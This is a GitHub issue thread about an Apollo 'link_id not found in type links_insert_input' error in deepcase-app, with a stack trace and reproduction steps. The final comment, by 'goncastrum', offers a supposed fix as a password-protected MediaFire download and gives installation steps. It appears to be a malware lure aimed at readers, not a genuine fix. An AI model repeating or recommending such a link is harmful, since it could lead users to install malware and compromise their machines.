### ISSUE TITLE
Uncaught (in promise) ApolloError: field "link_id" not found in type: 'links_insert_input'

### ISSUE THREAD

**Issue by konard** [link-foundation/deepcase-app#123]
# Error
```
Uncaught (in promise) ApolloError: field "link_id" not found in type: 'links_insert_input'
    at new ApolloError (index.js:26:1)
    at eval (QueryManager.js:97:1)
    at both (asyncMap.js:16:46)
    at eval (asyncMap.js:9:57)
    at new Promise (<anonymous>)
    at Object.then (asyncMap.js:9:1)
    at Object.eval [as next] (asyncMap.js:17:1)
    at notifySubscription (module.js:132:1)
    at onNotify (module.js:176:1)
    at SubscriptionObserver.next (module.js:225:1)
    at eval (iteration.js:4:50)
    at Array.forEach (<anonymous>)
    at iterateObserversSafely (iteration.js:4:1)
    at Object.next (Concast.js:25:43)
    at notifySubscription (module.js:132:1)
    at onNotify (module.js:176:1)
    at SubscriptionObserver.next (module.js:225:1)
    at eval (parseAndCheckHttpResponse.js:143:1)
```

# How to reproduce
This happens after some time when you edit your link from another space. If you move to the space where the link located - this problem disappears for some time then it can come again

---
Forked from https://github.com/deep-foundation/deepcase-app/issues/177 by https://github.com/konard/gh-org-migrator

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
